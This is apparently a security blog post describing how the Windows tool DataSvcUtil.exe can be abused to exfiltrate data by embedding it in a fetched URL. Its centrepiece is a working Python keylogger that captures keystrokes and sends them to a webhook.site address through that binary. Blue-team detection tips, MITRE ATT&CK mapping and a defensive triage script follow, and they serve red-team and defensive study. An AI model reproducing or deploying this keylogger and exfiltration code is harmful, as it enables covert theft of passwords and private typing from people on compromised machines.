Data Exfiltration with LOLBins [part 2]

movq %rax,%rax
3 min read · Dec 3, 2020

When it comes to data exfiltration, creativity and thinking outside the box are what matter most. As a reminder: the term “living off the land” (LOL) was coined by malware researchers Christopher Campbell and Matt Graeber to describe the use of trusted, pre-installed system tools to spread malware. There are a few different types of LOL techniques, including LOLBins, which use Windows binaries to hide malicious activity; LOLLibs, which use libraries; and LOLScripts, which use scripts.

This time, I managed to find another unexpected way using the WCF Data Service Client Utility (DataSvcUtil.exe). DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes needed to access a data service from a .NET Framework client application. Because it fetches that feed from whatever URI it is given, the binary itself makes the outbound request.

The DataSvcUtil.exe tool is installed in the .NET Framework directory. In many cases, this is located in:

  • C:\Windows\Microsoft.NET\Framework\v4.0.

For 64-bit systems, this is located in:

  • C:\Windows\Microsoft.NET\Framework64\v4.0.

You can also access the DataSvcUtil.exe tool from Developer Command Prompt for Visual Studio.

Syntax:

datasvcutil /out:file [/in:file | /uri:serviceuri] [/dataservicecollection] [/language:devlang] [/nologo] [/version:ver] [/help]

/uri:serviceuri: the service URI the tool fetches. For exfiltration, this is where the URL carrying the data goes; the data is appended to the URL and leaves the host inside the request.
Event as received by webhook.site

Now, a piece of code to help red team usage 🐦

    # From: https://github.com/moses-palmer/pynput
    from pynput.keyboard import Key, Listener
    import os
    import sys
    import subprocess

    URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
    uploader = "C:\\Windows\\Microsoft.NET\\Framework64\\v3.5\\DataSvcUtil.exe"
    content = ""

    def on_press(key):
        global content
        global URL
        global uploader
        if str(key) == 'Key.backspace':
            content += ' '
        else:
            content += str(key)
        print(f'last key: {str(key)}')
        print("")
        if str(key) == 'Key.enter':
            # The buffered keys are appended to the URL as the query string,
            # and DataSvcUtil.exe is the process that performs the request.
            upload_url = (f'{URL}?{content}')
            subprocess.call([uploader, 'c:\\temp\\test.xml', upload_url])
            buffer = ''
        if key == 0x03:
            sys.exit(0)

    if __name__ == "__main__":
        try:
            with Listener(on_press=on_press) as listener:
                listener.join()
        except (KeyboardInterrupt, SystemExit):
            sys.exit(0)

BlueTeam friends ↪️🕵↩️:

  • Prevent/detect DataSvcUtil.exe connecting to non-RFC1918 addresses with network IPS/IDS
  • Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.exe
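The two detection ideas above combined into one triage routine, as an added example that is not part of the original post. It runs over constructed Sysmon-style process-creation events (field names Image, User, CommandLine are assumed); a literal private IP in the target URL is treated as internal, while any hostname is treated as external since no DNS resolution is done here.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Constructed process-creation events, not real telemetry.
EVENTS = [
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe",
     "User": "CORP\\jdoe",
     "CommandLine": r"DataSvcUtil.exe /out:c:\temp\test.xml /uri:https://webhook.site/placeholder-id?Key.enter"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe",
     "User": "NT AUTHORITY\\SYSTEM",
     "CommandLine": r"DataSvcUtil.exe /out:c:\build\Client.cs /uri:http://10.1.2.3/odata.svc"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "User": "CORP\\jdoe",
     "CommandLine": "notepad.exe"},
]

# Accounts for which a DataSvcUtil.exe launch is considered expected (build/service context).
SERVICE_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def is_private_host(host):
    """True only for a literal RFC1918/loopback/link-local IP; hostnames count as external."""
    try:
        return ipaddress.ip_address(host).is_private
    except ValueError:
        return False


def evaluate(event):
    """Return the list of reasons this event is suspicious (empty if it is not)."""
    reasons = []
    if not event["Image"].lower().endswith("\\datasvcutil.exe"):
        return reasons
    if event["User"].upper() not in SERVICE_ACCOUNTS:
        reasons.append("non-service account launched DataSvcUtil.exe")
    # Every URL on the command line is a candidate OData target the binary will fetch.
    for url in URL_RE.findall(event["CommandLine"]):
        host = urlparse(url).hostname or ""
        if not is_private_host(host):
            reasons.append(f"outbound OData target outside RFC1918: {host}")
    return reasons


def triage(events):
    """Keep only events that tripped at least one rule, paired with their reasons."""
    return [(e["User"], evaluate(e)) for e in events if evaluate(e)]
```

Either condition alone is weak (developers legitimately run the tool, and internal OData services exist), so the useful alert is the conjunction: a non-service account driving DataSvcUtil.exe at an external host.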

MITRE ATT&CK Techniques:

  • ID: T1567
  • Sub-techniques: T1567.001, T1567.002
  • Tactic: Exfiltration
  • Requires Network: Yes
  • Platforms: Linux, Windows, macOS
  • Data Sources: Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection

movq %rax,%rax: reverse engineering and malware tales. LinkedIn: @isdebuggerpresent